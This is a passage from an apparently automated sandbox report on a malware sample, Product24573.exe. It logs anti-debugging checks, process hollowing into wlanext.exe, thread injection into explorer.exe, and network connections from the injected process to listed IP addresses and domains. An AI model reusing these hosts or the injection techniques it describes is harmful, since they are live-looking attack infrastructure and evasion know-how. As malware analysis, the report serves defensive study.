          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111746D mov eax, dword ptr fs:[00000030h]2_2_0111746D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110849B mov eax, dword ptr fs:[00000030h]2_2_0110849B
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B4496 mov eax, dword ptr fs:[00000030h]2_2_011B4496
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C8CD6 mov eax, dword ptr fs:[00000030h]2_2_011C8CD6
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B14FB mov eax, dword ptr fs:[00000030h]2_2_011B14FB
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01176CF0 mov eax, dword ptr fs:[00000030h]2_2_01176CF0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01176CF0 mov eax, dword ptr fs:[00000030h]2_2_01176CF0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01176CF0 mov eax, dword ptr fs:[00000030h]2_2_01176CF0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111F716 mov eax, dword ptr fs:[00000030h]2_2_0111F716
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118FF10 mov eax, dword ptr fs:[00000030h]2_2_0118FF10
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118FF10 mov eax, dword ptr fs:[00000030h]2_2_0118FF10
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C070D mov eax, dword ptr fs:[00000030h]2_2_011C070D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C070D mov eax, dword ptr fs:[00000030h]2_2_011C070D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112A70E mov eax, dword ptr fs:[00000030h]2_2_0112A70E
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112A70E mov eax, dword ptr fs:[00000030h]2_2_0112A70E
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F4F2E mov eax, dword ptr fs:[00000030h]2_2_010F4F2E
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F4F2E mov eax, dword ptr fs:[00000030h]2_2_010F4F2E
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112E730 mov eax, dword ptr fs:[00000030h]2_2_0112E730
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111B73D mov eax, dword ptr fs:[00000030h]2_2_0111B73D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111B73D mov eax, dword ptr fs:[00000030h]2_2_0111B73D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110EF40 mov eax, dword ptr fs:[00000030h]2_2_0110EF40
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110FF60 mov eax, dword ptr fs:[00000030h]2_2_0110FF60
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C8F6A mov eax, dword ptr fs:[00000030h]2_2_011C8F6A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01177794 mov eax, dword ptr fs:[00000030h]2_2_01177794
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01177794 mov eax, dword ptr fs:[00000030h]2_2_01177794
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01177794 mov eax, dword ptr fs:[00000030h]2_2_01177794
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01108794 mov eax, dword ptr fs:[00000030h]2_2_01108794
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011337F5 mov eax, dword ptr fs:[00000030h]2_2_011337F5
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112A61C mov eax, dword ptr fs:[00000030h]2_2_0112A61C
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112A61C mov eax, dword ptr fs:[00000030h]2_2_0112A61C
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FC600 mov eax, dword ptr fs:[00000030h]2_2_010FC600
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FC600 mov eax, dword ptr fs:[00000030h]2_2_010FC600
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FC600 mov eax, dword ptr fs:[00000030h]2_2_010FC600
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01128E00 mov eax, dword ptr fs:[00000030h]2_2_01128E00
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B1608 mov eax, dword ptr fs:[00000030h]2_2_011B1608
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011AFE3F mov eax, dword ptr fs:[00000030h]2_2_011AFE3F
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FE620 mov eax, dword ptr fs:[00000030h]2_2_010FE620
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01107E41 mov eax, dword ptr fs:[00000030h]2_2_01107E41
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01107E41 mov eax, dword ptr fs:[00000030h]2_2_01107E41
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01107E41 mov eax, dword ptr fs:[00000030h]2_2_01107E41
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01107E41 mov eax, dword ptr fs:[00000030h]2_2_01107E41
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01107E41 mov eax, dword ptr fs:[00000030h]2_2_01107E41
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01107E41 mov eax, dword ptr fs:[00000030h]2_2_01107E41
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011BAE44 mov eax, dword ptr fs:[00000030h]2_2_011BAE44
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011BAE44 mov eax, dword ptr fs:[00000030h]2_2_011BAE44
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111AE73 mov eax, dword ptr fs:[00000030h]2_2_0111AE73
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111AE73 mov eax, dword ptr fs:[00000030h]2_2_0111AE73
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111AE73 mov eax, dword ptr fs:[00000030h]2_2_0111AE73
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111AE73 mov eax, dword ptr fs:[00000030h]2_2_0111AE73
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111AE73 mov eax, dword ptr fs:[00000030h]2_2_0111AE73
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110766D mov eax, dword ptr fs:[00000030h]2_2_0110766D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118FE87 mov eax, dword ptr fs:[00000030h]2_2_0118FE87
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011746A7 mov eax, dword ptr fs:[00000030h]2_2_011746A7
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C0EA5 mov eax, dword ptr fs:[00000030h]2_2_011C0EA5
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C0EA5 mov eax, dword ptr fs:[00000030h]2_2_011C0EA5
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C0EA5 mov eax, dword ptr fs:[00000030h]2_2_011C0EA5
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C8ED6 mov eax, dword ptr fs:[00000030h]2_2_011C8ED6
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01138EC7 mov eax, dword ptr fs:[00000030h]2_2_01138EC7
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011AFEC0 mov eax, dword ptr fs:[00000030h]2_2_011AFEC0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011236CC mov eax, dword ptr fs:[00000030h]2_2_011236CC
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011216E0 mov ecx, dword ptr fs:[00000030h]2_2_011216E0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011076E2 mov eax, dword ptr fs:[00000030h]2_2_011076E2
          Source: C:\Users\user\Desktop\Product24573.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0040CF03 LdrLoadDll,2_2_0040CF03
          Source: C:\Users\user\Desktop\Product24573.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Product24573.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E10000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Product24573.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Product24573.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Product24573.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exeJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exeJump to behavior
          Source: explorer.exe, 00000003.00000000.403337616.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.650423255.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000003.00000002.660713347.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.403337616.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.655158241.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.403337616.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.650423255.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.402942272.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.649878231.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000003.00000000.403337616.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.650423255.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Users\user\Desktop\Product24573.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
